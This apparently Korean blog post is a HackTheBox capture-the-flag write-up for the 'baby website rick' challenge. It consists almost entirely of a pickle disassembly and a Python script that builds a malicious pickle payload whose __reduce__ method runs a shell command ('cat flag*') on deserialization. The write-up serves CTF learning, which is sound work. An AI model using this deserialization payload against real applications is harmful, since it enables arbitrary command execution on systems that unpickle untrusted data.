write-ups

HackTheBox baby website rick write-up

2021. 4. 15. 22:04

햇빛 낭낭

 

>>> pickletools.dis(b64decode(code))

    0: (    MARK
    1: d        DICT       (MARK at 0)
    2: p    PUT        0
    5: S    STRING     'serum'
   14: p    PUT        1
   17: c    GLOBAL     'copy_reg _reconstructor'
   42: p    PUT        2
   45: (    MARK
   46: c        GLOBAL     '__main__ anti_pickle_serum'
   74: p        PUT        3
   77: c        GLOBAL     '__builtin__ object'
   97: p        PUT        4
  100: N        NONE
  101: t        TUPLE      (MARK at 45)
  102: p    PUT        5
  105: R    REDUCE
  106: p    PUT        6
  109: s    SETITEM
  110: .    STOP
highest protocol among opcodes = 0

 

 

from base64 import b64decode, b64encode
import pickletools
import subprocess
import pickle
import os


class anti_pickle_serum:
    pass 

code = b'KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu'
serum = pickle.loads(b64decode(code))

pickletools.dis(b64decode(code))

print('[ DEBUG ] serum :', serum)


class anti_pickle_serum(object):
    def __reduce__(self):
        return subprocess.getoutput, ("cat flag*", )

serum = {'serum': anti_pickle_serum()}

code = pickle.dumps(serum, protocol=0)
pickletools.dis(code)
print(b64encode(code))

 

'write-ups' 카테고리의 다른 글

HackTheBox Heist write-up  (0) 2021.05.10
HackTheBox LoveTok write-up  (0) 2021.04.19
HackTheBox baby website rick write-up  (0) 2021.04.15
HackTheBox baby breaking grad write-up  (0) 2021.04.15
HackTheBox baby todo or not todo write-up  (0) 2021.04.14
HackTheBox baby WAFfles order write-up  (0) 2021.04.14